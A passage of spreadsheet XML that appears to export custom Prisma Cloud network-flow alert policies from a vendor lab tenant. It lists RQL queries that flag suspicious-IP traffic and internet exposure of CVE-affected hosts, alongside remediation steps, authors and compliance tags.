      <c r="J3496" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3496" t="inlineStr">
        <is>
          <t>ranti-gartner-test</t>
        </is>
      </c>
      <c r="L3496" t="inlineStr"/>
      <c r="M3496" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3496" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3496" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3496" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3496" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="R3496" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="S3496" t="inlineStr">
        <is>
          <t>Network,segmentation</t>
        </is>
      </c>
      <c r="T3496" t="b">
        <v>0</v>
      </c>
      <c r="U3496" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3496" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3496" t="inlineStr"/>
      <c r="X3496" t="inlineStr"/>
      <c r="Y3496" t="inlineStr"/>
      <c r="Z3496" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where source.ip = 10.32.5.164 and dest.ip = 10.88.155.229</t>
        </is>
      </c>
      <c r="AA3496" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3496" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:58</t>
        </is>
      </c>
      <c r="AC3496" t="inlineStr"/>
      <c r="AD3496" t="b">
        <v>0</v>
      </c>
      <c r="AE3496" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3496" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG349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6" t="inlineStr">
        <is>
          <t>60fabd21-c6b2-425b-9d14-87f836f6e71a</t>
        </is>
      </c>
      <c r="AI3496" t="inlineStr">
        <is>
          <t>c6b10476-5fb7-43ba-b801-1363928c6ec6</t>
        </is>
      </c>
      <c r="AJ3496" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3496" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3497">
      <c r="A3497" t="inlineStr"/>
      <c r="B3497" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3497" s="2" t="inlineStr"/>
      <c r="D3497" t="inlineStr"/>
      <c r="E3497" t="inlineStr"/>
      <c r="F3497" t="inlineStr"/>
      <c r="G3497" t="b">
        <v>0</v>
      </c>
      <c r="H349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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3497" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3497" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="L3497" t="inlineStr"/>
      <c r="M3497" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3497" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3497" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3497" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3497" t="inlineStr"/>
      <c r="R3497" t="inlineStr"/>
      <c r="S3497" t="inlineStr"/>
      <c r="T3497" t="b">
        <v>0</v>
      </c>
      <c r="U3497" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3497" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3497" t="inlineStr"/>
      <c r="X3497" t="inlineStr"/>
      <c r="Y3497" t="inlineStr"/>
      <c r="Z3497" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where dest.resource IN ( resource where finding.type = 'AWS GuardDuty Host' )</t>
        </is>
      </c>
      <c r="AA3497" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3497" t="inlineStr">
        <is>
          <t>2024-09-13 17:11:23</t>
        </is>
      </c>
      <c r="AC3497" t="inlineStr"/>
      <c r="AD3497" t="b">
        <v>0</v>
      </c>
      <c r="AE3497" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3497" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG349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7" t="inlineStr">
        <is>
          <t>6902be12-dd8d-44fb-85e5-9558755d5c15</t>
        </is>
      </c>
      <c r="AI3497" t="inlineStr">
        <is>
          <t>57a7df0e-d306-408f-943c-84b6acf459dd</t>
        </is>
      </c>
      <c r="AJ3497" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3497" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3498">
      <c r="A3498" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B3498" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3498" s="2" t="inlineStr"/>
      <c r="D3498" t="inlineStr"/>
      <c r="E3498" t="inlineStr"/>
      <c r="F3498" t="inlineStr"/>
      <c r="G3498" t="b">
        <v>1</v>
      </c>
      <c r="H3498"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498" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3498" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3498" t="inlineStr">
        <is>
          <t>test-network</t>
        </is>
      </c>
      <c r="L3498" t="inlineStr"/>
      <c r="M3498" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3498" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3498" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3498" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3498" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="R3498" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="S3498" t="inlineStr">
        <is>
          <t>CPA,Exposure,Custom</t>
        </is>
      </c>
      <c r="T3498" t="b">
        <v>0</v>
      </c>
      <c r="U3498" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3498" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3498" t="inlineStr"/>
      <c r="X3498" t="inlineStr"/>
      <c r="Y3498" t="inlineStr"/>
      <c r="Z3498" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 100000 AND source.publicnetwork = 'Internet IPs'</t>
        </is>
      </c>
      <c r="AA3498" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB3498" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:34</t>
        </is>
      </c>
      <c r="AC3498" t="inlineStr"/>
      <c r="AD3498" t="b">
        <v>0</v>
      </c>
      <c r="AE3498" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3498" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3498"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498" t="inlineStr">
        <is>
          <t>7dc4dad5-267d-4de2-8dbd-ddbbd9bec3ad</t>
        </is>
      </c>
      <c r="AI3498" t="inlineStr">
        <is>
          <t>35976e8f-9484-4cc3-a84f-6f1b45e93afa</t>
        </is>
      </c>
      <c r="AJ3498" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3498" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3499">
      <c r="A3499" t="inlineStr"/>
      <c r="B3499" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3499" s="2" t="inlineStr"/>
      <c r="D3499" t="inlineStr"/>
      <c r="E3499" t="inlineStr"/>
      <c r="F3499" t="inlineStr"/>
      <c r="G3499" t="b">
        <v>0</v>
      </c>
      <c r="H349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499" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3499" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3499" t="inlineStr">
        <is>
          <t>kfirdaus-policy</t>
        </is>
      </c>
      <c r="L3499" t="inlineStr"/>
      <c r="M3499" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3499" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3499" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3499" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3499" t="inlineStr"/>
      <c r="R3499" t="inlineStr"/>
      <c r="S3499" t="inlineStr"/>
      <c r="T3499" t="b">
        <v>0</v>
      </c>
      <c r="U3499" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3499" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3499" t="inlineStr"/>
      <c r="X3499" t="inlineStr"/>
      <c r="Y3499" t="inlineStr"/>
      <c r="Z3499" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where dest.ip IN ( 1.1.1.0/24)</t>
        </is>
      </c>
      <c r="AA3499" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3499" t="inlineStr">
        <is>
          <t>2024-09-13 17:09:48</t>
        </is>
      </c>
      <c r="AC3499" t="inlineStr"/>
      <c r="AD3499" t="b">
        <v>0</v>
      </c>
      <c r="AE3499" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3499" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG349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499" t="inlineStr">
        <is>
          <t>c7c3044d-4186-47bd-bac5-d0f4db5d56ca</t>
        </is>
      </c>
      <c r="AI3499" t="inlineStr">
        <is>
          <t>ac46d17c-eb61-409e-a5b6-5c4ecce3f77d</t>
        </is>
      </c>
      <c r="AJ3499" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3499" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3500">
      <c r="A3500" t="inlineStr">
        <is>
          <t>PIPEDA</t>
        </is>
      </c>
      <c r="B3500" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3500" s="2" t="inlineStr"/>
      <c r="D3500" t="inlineStr"/>
      <c r="E3500" t="inlineStr"/>
      <c r="F3500" t="inlineStr"/>
      <c r="G3500" t="b">
        <v>0</v>
      </c>
      <c r="H350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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3500" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3500" t="inlineStr">
        <is>
          <t>Suspicious Ip communication</t>
        </is>
      </c>
      <c r="L3500" t="inlineStr"/>
      <c r="M3500" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3500" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3500" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3500" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3500" t="inlineStr">
        <is>
          <t>4.7</t>
        </is>
      </c>
      <c r="R3500" t="inlineStr">
        <is>
          <t>4.7.5</t>
        </is>
      </c>
      <c r="S3500" t="inlineStr"/>
      <c r="T3500" t="b">
        <v>0</v>
      </c>
      <c r="U3500" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3500" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3500" t="inlineStr"/>
      <c r="X3500" t="inlineStr"/>
      <c r="Y3500" t="inlineStr"/>
      <c r="Z3500" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 and source.publicnetwork = 'Suspicious IPs' AND accepted.bytes &gt; 0 AND response.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3500" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3500" t="inlineStr">
        <is>
          <t>2024-09-13 17:21:51</t>
        </is>
      </c>
      <c r="AC3500" t="inlineStr"/>
      <c r="AD3500" t="b">
        <v>0</v>
      </c>
      <c r="AE3500" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3500" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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0" t="inlineStr">
        <is>
          <t>74e2444b-aa40-425f-99e4-e2693b790d43</t>
        </is>
      </c>
      <c r="AI3500" t="inlineStr">
        <is>
          <t>97aa7551-befa-4592-af86-947e095abd70</t>
        </is>
      </c>
      <c r="AJ3500" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3500" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3501">
      <c r="A3501" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (GKE) - Level 2</t>
        </is>
      </c>
      <c r="B3501" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3501" s="2" t="inlineStr"/>
      <c r="D3501" t="inlineStr"/>
      <c r="E3501" t="inlineStr"/>
      <c r="F3501" t="inlineStr"/>
      <c r="G3501" t="b">
        <v>0</v>
      </c>
      <c r="H350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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3501" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3501" t="inlineStr">
        <is>
          <t>Will Network test policy</t>
        </is>
      </c>
      <c r="L3501" t="inlineStr"/>
      <c r="M3501" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3501" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3501" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3501" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3501" t="inlineStr">
        <is>
          <t>Policies</t>
        </is>
      </c>
      <c r="R3501" t="inlineStr">
        <is>
          <t>4.6.3</t>
        </is>
      </c>
      <c r="S3501" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T3501" t="b">
        <v>0</v>
      </c>
      <c r="U3501" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3501" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3501" t="inlineStr">
        <is>
          <t>Will Network test policy</t>
        </is>
      </c>
      <c r="X3501" t="inlineStr">
        <is>
          <t>na</t>
        </is>
      </c>
      <c r="Y3501" t="inlineStr"/>
      <c r="Z3501" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where source.ip IN ( 192.1.1.1 ) AND dest.ip IN ( 10.254.0.0/16 )</t>
        </is>
      </c>
      <c r="AA3501" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3501" t="inlineStr">
        <is>
          <t>2024-09-13 16:57:36</t>
        </is>
      </c>
      <c r="AC3501" t="inlineStr"/>
      <c r="AD3501" t="b">
        <v>0</v>
      </c>
      <c r="AE3501" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3501" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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1" t="inlineStr">
        <is>
          <t>7e8f9162-45e6-4045-8784-c77b9a507f08</t>
        </is>
      </c>
      <c r="AI3501" t="inlineStr">
        <is>
          <t>4ce58e04-b13e-4420-9346-ca0fb93dbb7b</t>
        </is>
      </c>
      <c r="AJ3501" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3501" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3502">
      <c r="A3502" t="inlineStr"/>
      <c r="B3502" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3502" s="2" t="inlineStr"/>
      <c r="D3502" t="inlineStr"/>
      <c r="E3502" t="inlineStr"/>
      <c r="F3502" t="inlineStr"/>
      <c r="G3502" t="b">
        <v>0</v>
      </c>
      <c r="H350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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3502" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3502" t="inlineStr">
        <is>
          <t>Test Network policy  CVE-2023-44487</t>
        </is>
      </c>
      <c r="L3502" t="inlineStr"/>
      <c r="M3502" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3502" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3502" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3502" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3502" t="inlineStr"/>
      <c r="R3502" t="inlineStr"/>
      <c r="S3502" t="inlineStr">
        <is>
          <t>Network</t>
        </is>
      </c>
      <c r="T3502" t="b">
        <v>0</v>
      </c>
      <c r="U3502" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3502" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3502" t="inlineStr"/>
      <c r="X3502" t="inlineStr"/>
      <c r="Y3502" t="inlineStr"/>
      <c r="Z3502" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where src.publicnetwork IN ('Suspicious IPs','Internet IPs') AND dest.resource IN ( resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2023-44487')) and protocol = 'TCP' AND accepted.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3502" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3502" t="inlineStr">
        <is>
          <t>2024-09-13 16:57:33</t>
        </is>
      </c>
      <c r="AC3502" t="inlineStr"/>
      <c r="AD3502" t="b">
        <v>0</v>
      </c>
      <c r="AE3502" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3502" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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2" t="inlineStr">
        <is>
          <t>2ba2da4c-27cc-4dee-9629-0c08e8356f68</t>
        </is>
      </c>
      <c r="AI3502" t="inlineStr">
        <is>
          <t>322ecd57-6cb2-4d71-ae5b-58d44cc1a4e2</t>
        </is>
      </c>
      <c r="AJ3502" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3502" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3503">
      <c r="A3503" t="inlineStr"/>
      <c r="B3503" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3503" s="2" t="inlineStr"/>
      <c r="D3503" t="inlineStr"/>
      <c r="E3503" t="inlineStr"/>
      <c r="F3503" t="inlineStr"/>
      <c r="G3503" t="b">
        <v>1</v>
      </c>
      <c r="H3503"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03" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3503" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3503" t="inlineStr">
        <is>
          <t>tag Kashan Instance affected by Spring Cloud Function SpringShell vulnerability is exposed to network traffic from the internet [CVE-2022-22963]</t>
        </is>
      </c>
      <c r="L3503" t="inlineStr"/>
      <c r="M3503" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3503" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3503" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3503" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3503" t="inlineStr"/>
      <c r="R3503" t="inlineStr"/>
      <c r="S3503" t="inlineStr"/>
      <c r="T3503" t="b">
        <v>0</v>
      </c>
      <c r="U3503" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3503" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3503" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with the Spring Cloud Function version vulnerable to arbitrary code execution (CVE-2022-22963) and exposed to network traffic from the internet. It is recommended to upgrade the Spring Cloud Function version to the latest version and limit exposure to the internet.
For details refer:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3503" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Review the identified instance and investigate the network traffic.
3. Log in to the host and make sure that there are no processes running that indicate a potential compromise.
4. If this instance is not authorized to process or host Spring Cloud Function related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Spring Cloud Function related services then upgrade Spring Cloud Function version to latest to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3503" t="inlineStr"/>
      <c r="Z3503" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND source.resource IN (resource where finding.type IN ( 'Host Vulnerability' ) AND finding.source IN ( 'Prisma Cloud' ) AND finding.name IN ('CVE-2022-22963')) AND destination.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3503" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3503" t="inlineStr">
        <is>
          <t>2024-09-19 15:49:49</t>
        </is>
      </c>
      <c r="AC3503" t="inlineStr"/>
      <c r="AD3503" t="b">
        <v>0</v>
      </c>
      <c r="AE3503" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3503" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3503"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03" t="inlineStr">
        <is>
          <t>9057a7b5-11a9-43a7-948c-61c697807e76</t>
        </is>
      </c>
      <c r="AI3503" t="inlineStr">
        <is>
          <t>7c2a8051-e9b4-4457-b836-4fcf04f45b16</t>
        </is>
      </c>
      <c r="AJ3503" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3503" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3504">
      <c r="A3504" t="inlineStr">
        <is>
          <t>BB</t>
        </is>
      </c>
      <c r="B3504" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C3504" s="2" t="inlineStr"/>
      <c r="D3504" t="n">
        <v>33</v>
      </c>
      <c r="E3504" t="n">
        <v>78</v>
      </c>
      <c r="F3504" t="n">
        <v>0</v>
      </c>
      <c r="G3504" t="b">
        <v>1</v>
      </c>
      <c r="H3504"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mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I3504" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3504" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3504" t="inlineStr">
        <is>
          <t>Instance affected by Argo CD vulnerability [CVE-2022-24348]  is accepting  network traffic from 185.172.128.127</t>
        </is>
      </c>
      <c r="L3504" t="inlineStr"/>
      <c r="M3504" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3504" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3504" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3504" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3504" t="inlineStr">
        <is>
          <t>122345</t>
        </is>
      </c>
      <c r="R3504" t="inlineStr">
        <is>
          <t>123456-1</t>
        </is>
      </c>
      <c r="S3504" t="inlineStr">
        <is>
          <t>Custom</t>
        </is>
      </c>
      <c r="T3504" t="b">
        <v>0</v>
      </c>
      <c r="U3504" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3504" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3504" t="inlineStr">
        <is>
          <t>185.172.128.127</t>
        </is>
      </c>
      <c r="X3504"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Argo CD related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Argo CD related services then upgrade Argo CD to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3504" t="inlineStr"/>
      <c r="Z3504" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where source.publicnetwork IN ( 'Internet IPs' ) AND protocol = 'TCP' AND dest.port IN ( 21,23,80,8080,1521,1433,25,8081,22 )</t>
        </is>
      </c>
      <c r="AA3504" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB3504" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:34</t>
        </is>
      </c>
      <c r="AC3504" t="inlineStr"/>
      <c r="AD3504" t="b">
        <v>0</v>
      </c>
      <c r="AE3504" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3504" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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t>
        </is>
      </c>
      <c r="AH3504" t="inlineStr">
        <is>
          <t>35b36b54-63ad-4da8-a6d6-dc8575872ebb</t>
        </is>
      </c>
      <c r="AI3504" t="inlineStr">
        <is>
          <t>2f14eeb2-a28b-4399-b098-04365ac6624e</t>
        </is>
      </c>
      <c r="AJ3504" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3504" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3505">
      <c r="A3505" t="inlineStr"/>
      <c r="B3505" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3505" s="2" t="inlineStr"/>
      <c r="D3505" t="inlineStr"/>
      <c r="E3505" t="inlineStr"/>
      <c r="F3505" t="inlineStr"/>
      <c r="G3505" t="b">
        <v>0</v>
      </c>
      <c r="H350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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3505" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3505" t="inlineStr">
        <is>
          <t>kfirdaus-test-synchrony</t>
        </is>
      </c>
      <c r="L3505" t="inlineStr"/>
      <c r="M3505" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3505" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3505" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3505" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3505" t="inlineStr"/>
      <c r="R3505" t="inlineStr"/>
      <c r="S3505" t="inlineStr"/>
      <c r="T3505" t="b">
        <v>0</v>
      </c>
      <c r="U3505" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3505" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3505" t="inlineStr"/>
      <c r="X3505" t="inlineStr"/>
      <c r="Y3505" t="inlineStr"/>
      <c r="Z3505" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where accepted.bytes &gt; 100000 AND cloud.account = 'AzurePCSLab'</t>
        </is>
      </c>
      <c r="AA3505" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3505" t="inlineStr">
        <is>
          <t>2024-09-13 16:57:22</t>
        </is>
      </c>
      <c r="AC3505" t="inlineStr"/>
      <c r="AD3505" t="b">
        <v>0</v>
      </c>
      <c r="AE3505" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3505" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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5" t="inlineStr">
        <is>
          <t>79b86253-9404-46ff-9646-404cc4ee498c</t>
        </is>
      </c>
      <c r="AI3505" t="inlineStr">
        <is>
          <t>6036e253-381d-40a4-8704-8cd727d1eb69</t>
        </is>
      </c>
      <c r="AJ3505" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3505" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3506">
      <c r="A3506" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3506" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
